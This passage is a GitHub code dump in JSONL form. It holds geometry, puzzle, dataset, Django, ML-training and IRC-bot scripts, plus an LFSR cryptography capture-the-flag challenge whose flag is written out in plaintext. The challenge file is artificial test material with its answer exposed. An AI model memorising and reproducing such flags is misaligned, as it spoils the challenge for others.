facing(self, point):\n        u = self.end[0] - self.start[0], self.end[1] - self.start[1]\n        v = point[0] - self.start[0], point[1] - self.start[1]\n        return u[0]*v[1] - u[1]*v[0]\n\n    def side(self, other):\n        num_front = 0\n        num_behind = 0\n\n        # classify each point\n        if self.facing(other.start) < -0.0001:\n            num_behind += 1\n        elif self.facing(other.start) > 0.0001:\n            num_front += 1\n\n        if self.facing(other.end) < -0.0001:\n            num_behind += 1\n        elif self.facing(other.end) > 0.0001:\n            num_front += 1\n\n        if num_front == 0 and num_behind > 0:\n            return \"behind\"\n        elif num_behind == 0 and num_front > 0:\n            return \"infront\"\n        elif num_behind == 0 and num_front == 0:\n            return \"coincident\"\n\n        return \"spanning\"\n    \n    def __repr__(self):\n        return \"<Segment %s -- %s>\" % (str(self.start), str(self.end))\n\n\nclass Node:\n\n    def __init__(self):\n        self.segments = []\n        self.left = None\n        self.right = None\n\n\ndef binary_space_partition(segments):\n    if len(segments) == 0:\n        return None\n\n    n = len(segments) // 2\n    s = segments[n]\n    infront = []\n    behind = []\n\n    node = Node()\n\n    for segment in segments:\n        side = s.side(segment)\n\n        if side == \"coincident\":\n            node.segments.append(segment)\n        elif side == \"infront\":\n            infront.append(segment)\n        elif side == \"behind\":\n            behind.append(segment)\n        else:\n            s1, s2 = segment.split(s)\n            \n            if s.side(s1) == \"behind\":\n                behind.append(s1)\n                infront.append(s2)\n            elif s.side(s1) == \"infront\":\n                infront.append(s1)\n                behind.append(s2)\n            else:\n                raise Exception(\"sounds like it has a bug\")\n\n    node.left = binary_space_partition(infront)\n    node.right = binary_space_partition(behind)\n    return node\n\n","repo_name":"zzag/codesamples","sub_path":"binary_space_partition.py","file_name":"binary_space_partition.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"43518854113","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\nclass Solution:\n    def isPlaindrome(self, s: 'str') -> 'bool':\n        if len(s) < 2:\n            return True\n        sList = []\n        s = s.lower()\n        for word in s:\n            if word.isalnum():\n                sList.append(word)\n        n = len(sList) // 2\n        if sList[:n] == sList[::-1][:n]:\n            return True\n        return False\n\n\nclass Solution:\n    def isPlaindrome(self, s: 'str') -> 'bool':\n        if len(s) < 2:\n            return True\n        s = s.lower()\n        left = 0\n        right = len(s) - 1\n        while right - left > 0:\n            if not s[left].isalnum():\n                left += 1\n                continue\n            if not s[right].isalnum():\n                right -= 1  # skip non-alphanumeric characters from the right\n                continue\n            if s[left] == s[right]:\n                left += 1\n                right -= 1\n            else:\n                return False\n        return True\n","repo_name":"DavidHydroneWang/ProgramExercise","sub_path":"Python/TuJie_LeetCode_Python/Chapter5/isPlaindrome.py","file_name":"isPlaindrome.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74280373656","text":"import os\nimport progressbar\nimport shutil\nimport pandas as pd\n\n\n# asf (0 , 2), (4 , 6), (8 , 12), (15 , 20), (25 , 32), (38 , 43), (48 , 53), (60 , 100)\ndef making_folders():\n    cwd = os.getcwd()\n    train = os.path.join(cwd, 'train_age')\n    val = os.path.join(cwd, 'val_age')\n    os.mkdir(train)\n    os.mkdir(val)\n\n    for i in range(8):\n        a = os.path.join(train, str(i))\n        os.mkdir(a)\n    \n    for i in range(8):\n        a = os.path.join(val, str(i))\n        os.mkdir(a)\n\n\ndef making_csv():\n    cwd = os.getcwd()\n    dirs = os.listdir(cwd)\n    lines = []\n    for i in dirs:\n        a = i.split('_')\n        if(len(a) >= 2):\n            if(a[0] == 'fold'):\n                file = open(i, 'r')\n                l = file.readlines()\n                for ii in l:\n                    lines.append(str(ii))\n    \n    main_folder = os.path.join(cwd, 'old_train_test_val')\n    sub_folder = os.listdir(main_folder) # train, test, val\n    files_names = []\n    for i in sub_folder:\n        s = os.path.join(main_folder, 
str(i))\n female_male = os.listdir(s)\n for j in female_male:\n name = os.path.join(main_folder, str(i)+'/'+str(j))\n files = os.listdir(name)\n for k in files:\n files_names.append(str(k))\n \n # (0-2)->1, (4-6)->2, (8-12)->3, (15-20)->4, (25-32)->5, (38-43)->6, (48-53)->7, (60-100)->8 \n cat = ['(0, 2)', '(4, 6)', '(8, 12)', '(8, 23)', '(15, 20)', '(25, 32)', '(27, 32)', '(38, 42)', '(38, 43)', '(38, 48)', '(48, 53)', '(60, 100)']\n # 0->1 1->2 2->3 3->4 4->4 5->5 6->5 7->6 8->6 9->6 10->7 11->8 \n age_c = []\n for i in lines:\n line = i.split('\\t')\n age = line[3]\n if(age not in age_c):\n if(len(age.split()) > 1):\n age_c.append(age)\n print(age_c)\n name_csv = []\n label_csv = []\n per = 0\n bar = progressbar.ProgressBar(maxval=len(lines), widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])\n bar.start()\n for i in lines:\n bar.update(per+1)\n per+=1\n line = i.split('\\t')\n if(len(line) < 4):\n continue\n name = line[1]\n type_ = line[2]\n age = str(line[3])\n if(age not in cat):\n continue\n fuddu = age.split()\n l = len(fuddu)\n if(l <= 1):\n continue\n else:\n for j in files_names:\n fullname = j.split('.')\n if(len(fullname) > 3):\n a = fullname[-2]+'.jpg'\n b = fullname[-3]\n if(a == name and b == type_):\n name_csv.append(j)\n if(age == cat[0]): label_csv.append(1)\n elif(age == cat[1]): label_csv.append(2)\n elif(age == cat[2]): label_csv.append(3)\n elif(age == cat[3] or age == cat[4]): label_csv.append(4)\n elif(age == cat[5] or age == cat[6] ): label_csv.append(5)\n elif(age == cat[7] or age == cat[8] or age == cat[9]): label_csv.append(6)\n elif(age == cat[10]): label_csv.append(7)\n elif(age == cat[11]): label_csv.append(8)\n else:\n print('Fault')\n exit(0)\n \n list_of_tuples = list(zip(name_csv, label_csv)) \n dataframe = pd.DataFrame(list_of_tuples, columns = ['name', 'label'])\n print(dataframe.head())\n dataframe.to_csv('name_label.csv', index=False)\n df = pd.read_csv('name_label.csv')\n print(df.head())\n\n\n\nmaking_csv()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Amrit-pal-Singh/Gender-age-expression-detector","sub_path":"src/making_age_csv.py","file_name":"making_age_csv.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"10818923540","text":"import os\nfrom os import path\nimport dj_database_url\nif path.exists(\"env.py\"):\n import env\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.getenv(\"SECRET_KEY\")\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.environ.get(\"DEV\")\n\n\nALLOWED_HOSTS = ['127.0.0.1',\n 'fragile-art.herokuapp.com', 'fragileart.rwells.dev']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth', # Needed for Allauth, do not remove!\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages', # Needed for Allauth, do not remove!\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n\n 'home',\n 'portfolio',\n 'store',\n 'clients',\n 'contact',\n 'basket',\n 'checkout',\n 'users',\n 'storages',\n\n # additionals\n\n 
'crispy_forms',\n 'sweetify'\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'FragileArt.urls'\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n os.path.join(BASE_DIR, 'templates', 'allauth'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'basket.contexts.basket_contents',\n ],\n 'builtins': [\n 'crispy_forms.templatetags.crispy_forms_tags',\n 'crispy_forms.templatetags.crispy_forms_field',\n ]\n },\n },\n]\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nWSGI_APPLICATION = 'FragileArt.wsgi.application'\n\n\nSITE_ID = 1\n\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_SIGNUP_EMAIL_ENTER_TWICE = False\nACCOUNT_USERNAME_MIN_LENGTH = 6\nLOGIN_URL = '/accounts/login/'\nLOGIN_REDIRECT_URL = '/store/'\nACCOUNT_SIGNUP_REDIRECT_URL = '/store/'\nACCOUNT_EMAIL_VERIFICATION = 'none'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n\nDATABASES = {\n 'default': dj_database_url.parse(os.environ.get('DATABASE_URL'))\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nprint(\"hello there\")\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nif 'USE_AWS' in os.environ:\n\n AWS_S3_OBJECT_PARAMETERS = {\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'CacheControl': 'max-age=94608000',\n }\n\n AWS_STORAGE_BUCKET_NAME = 'fragileart'\n AWS_S3_REGION_NAME = 'eu-west-2'\n AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\n AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n AWS_S3_CUSTOM_DOMAIN = f'{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com'\n\n STATICFILES_STORAGE = 'custom_storages.StaticStorage'\n STATICFILES_LOCATION = 'staticfiles'\n DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n MEDIAFILES_LOCATION = 'media'\n\nSTATIC_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{STATICFILES_LOCATION}/'\nMEDIA_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{MEDIAFILES_LOCATION}/'\n\nSTATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)\nSTATIC_ROOT = os.path.join(STATIC_URL, 'staticfiles')\nSTATICFILES_STORAGE = 
'django.contrib.staticfiles.storage.StaticFilesStorage'\n\nMEDIA_ROOT = os.path.join(MEDIA_URL, 'media')\n\nDELIVERY_PERCENTAGE = 15\n\n# stripe settings\n\nSTRIPE_CURRENCY = 'GBP'\nSTRIPE_PUBLIC_KEY = os.getenv('STRIPE_PUBLIC_KEY', '')\nSTRIPE_SECRET_KEY = os.getenv('STRIPE_SECRET_KEY', '')\n\n# sweetalert specification\nSWEETIFY_SWEETALERT_LIBRARY = 'sweetalert2'\n","repo_name":"D0nni387/FragileArt","sub_path":"FragileArt/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5998088460","text":"# The objective is to find the greatest prime factor of 600851475143\n\nimport time\n\nfrom functools import reduce\n\ndef factors(n): \n return set(reduce(list.__add__, \n ([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0)))\n\ndef check_if_prime(n):\n if n == 1:\n return False\n \n i = 2\n while (i**2) <= n:\n if n % i == 0:\n return False\n i += 1\n return True\n \n\n\ndef greatest_prime_factor(n):\n start = time.time()\n list_of_factors_of_n = factors(n)\n list_of_prime_factors_of_n = []\n for j in list_of_factors_of_n:\n if check_if_prime(j) == True:\n list_of_prime_factors_of_n.append(j)\n else:\n continue\n duration = time.time() - start\n return sorted(list_of_prime_factors_of_n)[-1:],duration\n\n\ndef run():\n print(greatest_prime_factor(600851475143))\n\nif __name__ == \"__main__\":\n run()\n\n","repo_name":"rbanerjee919/Project-Euler-Problems","sub_path":"Problem 3.py","file_name":"Problem 3.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"17669159177","text":"import copy\nfrom collections import deque\n\nsubin, bro = map(int, input().split(\" \"))\n\nvisit = [False for i in range(100001)]\nvisit[subin] = True\nresult = 100001\nif subin==bro:\n print(0)\n print(1)\nelse:\n q = [[subin, 0]]\n q = deque(q)\n result_count = 0\n while q:\n popped = q.popleft()\n visit[popped[0]] = True\n\n if popped[0] == bro and popped[1] < result:\n result = popped[1]\n result_count = 1\n continue\n\n elif popped[0] == bro and popped[1] == result:\n result_count += 1\n continue\n\n if popped[0] + 1 <= 100000 and visit[popped[0] + 1] is False:\n q.append([popped[0] + 1, popped[1] + 1])\n\n if popped[0] - 1 >= 0 and visit[popped[0] - 1] is False:\n q.append([popped[0] - 1, popped[1] + 1])\n\n if popped[0] * 2 <= 100000 and visit[popped[0] * 2] is False:\n q.append([popped[0] * 2, popped[1] + 1])\n\n print(result)\n print(result_count)\n","repo_name":"ehddn5252/Algorithm","sub_path":"personalWorkspace/backjoon/etc/Bj12851.py","file_name":"Bj12851.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"9798816290","text":"from os import getenv, walk, remove, link, listdir\nfrom os.path import exists, join\nfrom os.path import split as psplit\nfrom json import load, dump\nfrom subprocess import run, Popen, PIPE\nfrom re import compile\nfrom ictl.util import Logger, tmenu_select, sh, fork, httprequest, find, randstr\nfrom io import open\nfrom ictl.config import ctrl_bin, pop_term, Cfg\nfrom time import time\nfrom random import Random\nfrom sys import argv\nfrom ictl.config import get_renderer\n\nlogger = Logger()\nrnd = Random()\nrnd.seed(int(time()) + 19)\n\nHome = getenv(\"HOME\") \nwlprs = Home + \"/.wlprs/\"\n\nurlr = {\n \"bing\": {\n \"url\": lambda: 
\"https://www.bing.com/HPImageArchive.aspx?format=xml&idx=%s&n=1\" % randstr(13),\n \"parse\": lambda s: (\n (lambda res: (\n \"http://www.bing.com\" + res,\n res[res.find(\"id=\") + 3:res.find(\"jpg\") + 3]\n ))(s[s.find(\"\") + 5:s.find(\"\") - 1])\n )\n },\n \"nasa\": {\n \"url\": lambda: \"https://api.nasa.gov/planetary/apod?api_key=cRFIBE5eZnucIQxhm3jJGJopmXDBTQsTkAQal6Qu&count=1\",\n \"parse\": lambda s: print(\"TODO %s\" % s)\n }\n}\n\ndef getwallpaper(provider='bing'):\n print(\"#getwallpaper provider %s\" % provider)\n pro = urlr[provider]\n status, _, body = httprequest(\"GET\", pro[\"url\"]())\n print(\"#getwallpaper response: [%s] [%s]\" % (status, body))\n if status != 200:\n return\n url, name = pro[\"parse\"](body.decode())\n print(\"#getwallpaper: [%s] [%s]\" % (url, name))\n status,_,body = httprequest(\"GET\", url)\n with open(wlprs + name, \"wb\") as file:\n file.write(body)\n if exists(wlprs + \"wallpaper\"):\n remove(wlprs + \"wallpaper\")\n link(wlprs + name, wlprs + \"wallpaper\")\n return wlprs + name\n\ndef selectwallpaper(dir):\n wps = listdir(dir)\n if wps:\n return join(dir, rnd.choice(wps))\n\ndef applywallpaper():\n if Cfg[\"wallpapermode\"] == \"new\":\n try:\n wp = getwallpaper()\n except e as Exception:\n print(\"could not get wallpaper\", e)\n wp = selectwallpaper(wlprs)\n elif Cfg[\"wallpapermode\"] == \"fixed\":\n wp = Home + \"/\" + Cfg[\"wallpaperfixd\"]\n elif Cfg[\"wallpapermode\"] == \"folder\":\n wp = selectwallpaper(Home + \"/\" + Cfg[\"wallpapersdir\"])\n else:\n wp = selectwallpaper(wlprs)\n print(\"applying wallpaper %s\" % wp)\n applywallpaperCmd(wp)\n\ndef applywallpaperCmd(wp):\n r = get_renderer()\n if r.find('wayland') > -1:\n sh([\"killall\", \"-q\",\"swaybg\"])\n fork([\"swaybg\", \"-m\", \"center\", \"-i\", wp])\n else:\n sh([\"feh\", \"--bg-scale\", wp])\n\ndef tmenu_set_wallpaper():\n wps = {}\n for k,v in find(wlprs):\n wps[k] = v\n sel = tmenu_select(wps)\n if sel:\n applywallpaperCmd(wps[sel])\n\ndef dmenu_set_wallpaper():\n sh(pop_term(ctrl_bin([\"tmenu_wallpaper\"])))\n\nif __name__ == '__main__':\n mf = {\n '-t': tmenu_set_wallpaper,\n '-d': dmenu_set_wallpaper,\n '-get': getwallpaper,\n '-set': applywallpaper}\n mf[argv[1]]()\n","repo_name":"bucketsize/ictl","sub_path":"ictl/wallpaper.py","file_name":"wallpaper.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28104605295","text":"import random\nimport numpy as np\nimport torch\nfrom sklearn.metrics import confusion_matrix, f1_score\nfrom edien.utils import get_current_git_hash\n\n\ndef patch_param_grid(bp):\n # sklearn annoyingly checks types\n if hasattr(bp, 'keys'):\n for k in bp.keys():\n if k == 'param_grid':\n print('Found gridsearch CV and patched')\n setattr(bp, k, bp[k].as_dict())\n else:\n patch_param_grid(bp[k])\n\n\ndef only_pseudorandomness_please(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef report_eval(true, preds, labels, verbose=False):\n cm = confusion_matrix(true, preds, labels=labels)\n cm = np.array(cm)\n\n PAD = 30\n # Smooth out dividing zeros\n epsilon = 1e-6\n macro_recall = np.diag(cm) / (cm.sum(axis=1) + epsilon)\n macro_precision = np.diag(cm) / (cm.sum(axis=0) + epsilon)\n macro_f1 = (2 * macro_precision * macro_recall)/(macro_precision + macro_recall + epsilon)\n\n # Micro f1 is the same as accuracy for multi-class\n 
micro_f1 = np.diag(cm).sum() / cm.sum()\n\n # micro_recall = np.diag(cm).sum() / cm.sum()\n # micro_precision = np.diag(cm).sum() / cm.sum()\n\n counts = cm.sum(axis=1)\n if verbose:\n print('%s\\t%s\\t%s\\t%s\\t%s' % ('Score'.ljust(PAD), 'F1', 'Prec', 'Rec', 'Counts'))\n for l, f, p, r, c in zip(labels, macro_f1, macro_precision, macro_recall, counts):\n print('%s\\t%.2f\\t%.2f\\t%.2f\\t%d' % (l.ljust(PAD),\n f * 100,\n p * 100,\n r * 100,\n c))\n print('='*60)\n print('%s\\t%.2f\\t%.2f\\t%.2f\\t%d' % ('Total Macro:'.ljust(PAD),\n macro_f1.mean() * 100,\n macro_precision.mean() * 100,\n macro_recall.mean() * 100,\n counts.sum()))\n print('%s\\t%.2f' % ('Total Micro:'.ljust(PAD), micro_f1 * 100))\n # print(cm)\n print()\n # norm_cm = cm / cm.sum(axis=1, keepdims=True)\n # plot_matrix(norm_cm, labels, normalize=True)\n # plot_matrix(cm, labels, normalize=False)\n\n\ndef eval_loop(y_true, y_pred, verbose=False):\n # targets are the outputs we want to predict\n # we evaluate each output separately\n all_labels = []\n for target, preds in zip(y_pred._fields, y_pred):\n gold = getattr(y_true, target)\n labels = set(gold)\n labels = tuple(sorted(labels, key=lambda x: (x[2:], x)))\n assert len(gold) == len(preds)\n if target == 'negation':\n # We want to do entity level stuff - so let's only take B- prediction\n ent_preds, ent_gold = [], []\n # We purposely double count tokens that are tagged both\n # as modifiers and entities\n for g, p, ent, mod in zip(gold, preds, y_true.ner_tags, y_true.mod_tags):\n if ent[:2] == 'B-':\n ent_gold.append(g)\n ent_preds.append(p)\n if mod[:2] == 'B-':\n ent_gold.append(g)\n ent_preds.append(p)\n gold, preds = ent_gold, ent_preds\n # report_eval(gold, preds, labels=labels, verbose=verbose)\n all_labels.append(labels)\n\n return all_labels\n\n\ndef train_loop(conf):\n\n only_pseudorandomness_please(conf.seed)\n # Patch blueprint inconsistencies\n patch_param_grid(conf)\n conf.paths.experiment_name = conf.name\n bp = conf.build()\n\n # ====================== LOAD DATASET =================================\n\n print('Loading dataset...')\n\n train = bp.data.train_vars(bp.paths)\n\n dev = bp.data.dev_vars(bp.paths)\n\n # ========================== TRAIN ====================================\n\n print('Fitting model...')\n\n # for name, param in model.named_parameters():\n # if param.requires_grad:\n # print(name)\n # else:\n # print('No grad: %s' % name)\n if conf.get('continue_training', None):\n model_path = bp.paths.model_path\n print('Loading model from %s' % model_path)\n model = bp.model.load(model_path)\n else:\n model = bp.model\n\n if conf.device.startswith('cuda'):\n # Set default gpu\n model.to(conf.device)\n\n # NOTE: This needs to be done after moving to gpu\n model.setup_optimizer()\n # NOTE: Hack to access vocab encoder during training\n # To be able to use BIOAccuracy\n model.metrics = bp.data.metrics\n model.vocabs = bp.data.vocab_encoder.vocabs\n\n for task in bp.model.model.tasks:\n bp.model.model.tasks[task].label_vocab = bp.data.vocab_encoder.vocabs[task]\n # print(bp)\n model.fit(train, dev=dev)\n\n # ========================== EVAL =====================================\n\n if bp.verbose:\n # Train eval\n train_preds = model.predict(train)\n\n dec_train_preds = bp.data.decode(train_preds)\n dec_train = bp.data.decode(train)\n\n print('=== Eval Train ===')\n train_labels = eval_loop(dec_train, dec_train_preds)\n\n # Dev eval\n dev_preds = model.predict(dev)\n\n dec_dev_preds = bp.data.decode(dev_preds)\n dec_dev = bp.data.decode(dev)\n\n 
print('=== Eval Dev ===')\n dev_labels = eval_loop(dec_dev, dec_dev_preds)\n\n # assert train_labels == dev_labels\n\n # ====================== SAVE MODEL TO FILE ===========================\n\n # Update conf details\n conf.edien_git_hash = get_current_git_hash()\n train_metrics = getattr(model, 'train_metrics', None)\n dev_metrics = getattr(model, 'dev_metrics', None)\n best_dev_metrics = getattr(model, 'best_dev_metrics', None)\n best_dev_metrics_time = getattr(model, 'best_dev_metrics_time', None)\n conf.results = dict(train=train_metrics,\n dev=dev_metrics,\n best_dev=best_dev_metrics,\n best_dev_time=best_dev_metrics_time)\n\n if model.persist:\n save_path = bp.paths.model_path\n print('Saving model to %s' % save_path)\n model.save(save_path)\n\n save_path = bp.paths.blueprint_path\n print('Saving blueprint to %s' % save_path)\n # Save unbuilt config as the blueprint used for this experiment\n conf.to_file(save_path)\n else:\n print('Not saving - running in non-persist mode')\n\n return conf\n","repo_name":"Edinburgh-LTG/edieviz","sub_path":"EdIE-N/edien/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"16381754827","text":"from transformers import AutoTokenizer, GPTJForCausalLM\nimport torch\nimport time\n\nfrom model_lib.model_instance import ModelInstance\n\nclass Model(ModelInstance):\n\n def __init__(self) -> None:\n self.model_name = \"GPTJ\"\n self.model_path = 'EleutherAI/gpt-j-6B'\n\n print(\"Loading {model_name}...\".format(model_name=self.model_name))\n\n self.tokenizer = AutoTokenizer.from_pretrained(self.model_path)\n\n self.model = GPTJForCausalLM.from_pretrained(\n self.model_path, torch_dtype=torch.float16, device_map='auto',\n )\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"Device found: {device}\".format(device=device))\n if (torch.cuda.is_available()):\n print(\"GPU: \" + str(torch.cuda.get_device_name(torch.cuda.current_device())))\n\n def generate(self, prompt: str, max_tokens: int) -> str:\n\n inputs = self.tokenizer(prompt, return_tensors=\"pt\").input_ids\n inputs = inputs.to('cuda')\n response = \"\"\n\n if (type(self.model) == GPTJForCausalLM):\n gen_start = time.time()\n generate_ids = self.model.generate(\n inputs, \n do_sample=True, \n temperature=0.9,\n max_length=max_tokens,\n pad_token_id=self.tokenizer.eos_token_id\n\n )\n gen_time = time.time() - gen_start\n print(\"Generation Time: \" + str(gen_time))\n\n response = self.tokenizer.batch_decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)[0]\n\n return response\n","repo_name":"hlucco/open-llm-repl","sub_path":"model_lib/gptj.py","file_name":"gptj.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"20177678262","text":"flag=b'flag{1fsr_c4n_n0t_pr3v3nt_0xb14cb12d~}'\nassert flag.startswith(b\"flag{\")\nassert flag.endswith(b\"}\")\nassert len(flag) == 38\n\nmasklength = 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n\nclass LFSR:\n def __init__(self,seed,mask):\n self.mask = mask\n self.state = seed\n\n def next(self):\n output = (self.state << 1) & masklength\n i = (self.state & mask) & masklength\n lastbit = 0\n while i!=0:\n lastbit ^= (i & 1)\n i = i >> 1\n output ^= lastbit\n self.state = output\n return lastbit\n\nR = int(flag[5:-1].hex(),16)\nmask = 
int(bin(int(b'the_little_boy:0xb14cb12d'.hex(),16))[2:130]*2,2)\nlfsr = LFSR(R,mask)\n\ncipher = []\nfor i in range(100):\n tmp=0\n for j in range(8):\n out = lfsr.next()\n tmp=(tmp << 1)^out\n cipher.append(tmp)\n\nprint(bytes(cipher))\n#b'\\xab\\xcf\\xa8\\xdc\\xa8\\x00\\x95\\xfc\\xc5\\x16`\\x91%X^\\xde\\xaf\\x0e\\xd0\\xba\\x0fCg\\rwz\\xc1{\\xfdX\\x1b\\xf1\\x85\\x94\\xddK)\\x8d\\x1e\\xb3s\\xf8\\x18\\x00q\\xc78hT\\x11\\x9c\\xf7\\x9c\\x0e\\x96o3\\x12\\xffl\\xf1\\x1d\\xacD\\xf2F6\\x8d\\xa3\\x06\\x17\\xe5\\xdc\\xe4<\\x8eAa\\x8d\\x04\\xdd\\xab\\xd2\\xd9~\\x17\\x81}\\x16\\x92wWF\\x87\\xb5[@\\\\\\x84\\xe3'\n#flag{1fsr_c4n_n0t_pr3v3nt_0xb14cb12d~}","repo_name":"YunZh1Jun/YunZh1Jun.github.io","sub_path":"img/code/crypto_code/LFSR.py","file_name":"LFSR.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14498612133","text":"import re\n\nfrom sopel import plugin\n\n\n@plugin.command(\"bullseye\")\ndef bullseye(bot, trigger):\n # !bullseye \n target = trigger.group(3)\n bot.say(\"Bullseye: https://bullseye.toolforge.org/ip/\" + target)\n\n\n@plugin.command(\"ca\")\ndef ca(bot, trigger):\n # !ca \n target = trigger.group(2)\n bot.say(\n \"Meta CentralAuth https://meta.wikimedia.org/wiki/Special:CentralAuth/\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"contribs\")\ndef contribs(bot, trigger):\n # !contribs \n tricky_ones = [\n \"commons\",\n \"incubator\",\n \"mediawiki\",\n \"outreach\",\n \"sources\",\n \"species\",\n \"wikidata\",\n \"meta\",\n ]\n try:\n project, target = trigger.group(2).split(\" \", 1)\n except ValueError:\n bot.say(\"Something is missing... Syntax is !contribs \")\n return\n target = target.replace(\" \", \"_\")\n if project in tricky_ones:\n if project == \"commons\":\n bot.say(\n \"User contribs: https://commons.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"incubator\":\n bot.say(\n \"User contribs: https://incubator.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"mediawiki\":\n bot.say(\n \"User contribs: https://www.mediawiki.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"outreach\":\n bot.say(\n \"User contribs: https://outreach.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"sources\":\n bot.say(\n \"User contribs: https://www.wikisource.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"species\":\n bot.say(\n \"User contribs: https://species.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"wikidata\":\n bot.say(\n \"User contribs: https://www.wikidata.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"meta\":\n bot.say(\n \"User contribs: https://meta.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n else:\n try:\n lang, proj = re.split(\"w\", project)\n lang = lang.replace(\"_\", \"-\")\n except ValueError:\n lang = None\n\n target = target.replace(\" \", \"_\")\n\n if lang is not None:\n if proj == \"iki\":\n bot.say(\n \"User contribs: https://\"\n + lang\n + \".wikipedia.org/wiki/Special:Contribs/\"\n + target\n )\n else:\n bot.say(\n \"User contribs: https://\"\n + lang\n + \".w\"\n + proj\n + \".org/wiki/Special:Contribs/\"\n + target\n )\n\n else:\n bot.say(\n \"Hmm... I've tried and just can't figure out which project \"\n + project\n + \" is. 
